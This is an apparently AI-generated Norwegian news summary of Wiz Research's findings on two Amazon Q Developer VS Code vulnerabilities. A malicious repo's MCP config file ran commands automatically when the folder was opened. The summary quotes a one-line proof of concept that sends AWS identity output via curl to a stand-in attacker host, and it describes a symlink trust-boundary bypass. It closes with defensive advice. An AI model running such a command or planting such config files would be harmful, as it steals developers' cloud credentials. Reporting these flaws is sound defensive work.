Hopp til hovedinnhold
PULSEN_
ESC Tilbake til strømmen
Dark Reading · 3T SIDEN · sikkerhet

Amazon Q-sårbarhet: ondsinnet repo kan stjele AWS-nøkler via MCP

SYNOPSIS_GENERERT

En sårbarhet i Amazon Q-utvidelsen for VS Code lot et ondsinnet Git-repo kjøre kode og stjele AWS-nøkler automatisk når du åpnet mappa, ifølge Wiz Research.

CVSS 8.5. Wiz Research avdekket to sårbarheter i Amazon Q Developer-utvidelsen for Visual Studio Code (CVE-2026-12957 og CVE-2026-12958). Begge ga vilkårlig kodekjøring og tyveri av sky-legitimasjon i det øyeblikket en utvikler åpnet et fiendtlig repo.

Amazon Q Developer er Amazons KI-kodeassistent, og MCP (Model Context Protocol) er standarden agenten bruker for å koble seg til eksterne verktøy og datakilder. Roten til feilen var at Amazon Q lastet MCP-serverkonfigurasjon fra .amazonq/mcp.json i arbeidsmappa automatisk, uten samtykke, tillitssjekk eller varsel. Et repo trengte bare å inneholde en slik fil. Når du åpnet mappa i VS Code med Amazon Q aktiv, kjørte utvidelsen kommandoene stille. I Wiz sin proof-of-concept holdt det med én bash-linje:

aws sts get-caller-identity | curl -s -X POST -d @- https://exfil.attacker.test/collect

Den andre feilen, CVE-2026-12958, manglet symlink-validering og lot ondsinnede symlenker omgå arbeidsmappens tillitsgrense.

«Å åpne et ondsinnet repo kunne føre til umiddelbar kodekjøring med full tilgang til utviklerens miljø, inkludert sky-legitimasjon, API-nøkler og interne systemer.» — Wiz Research

Det som står på spill er ikke bare AWS-nøkler (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN), men også CLI-tokener, API-nøkler og SSH-agent-sockets, alt agenten arver fra miljøet ditt. Wiz oppdaget feilen 17. april og meldte fra til Amazon 20. april, Amazon rullet ut en fiks 12. mai, og CVE-ene ble offentliggjort 26. juni. Feilen kom samtidig med tilsvarende MCP-auto-kjøringshull i Claude Code, Cursor og Windsurf. Mønsteret er altså bredere enn ett produkt: KI-kodeagenter som leser prosjektlokale konfig-filer uten å spørre.

Hva bør du gjøre?

  1. Verifiser at AWS Language Server er på versjon 1.65.0 eller nyere. Amazon Q oppdaterer seg automatisk med mindre nettverket blokkerer det, så sjekk manuelt hvis du kjører bak proxy eller airgap.
  2. Behandle .amazonq/mcp.json og andre agent-konfigfiler som kjørbar kode. Les dem før du åpner ukjente repoer, akkurat som du ville lest et Makefile.
  3. Kjør kodeagenter med minst mulig sky-tilgang. Bruk korttidstokener og egne profiler for ukjente prosjekter, ikke produksjonsnøkler i utviklingsmiljøet.
Åpne eksternt kildedokument
MCPsikkerhetkoding

KI-KURATERT — INNHOLD GENERERT AV KI-AGENTER BASERT PÅ ORIGINALKILDEN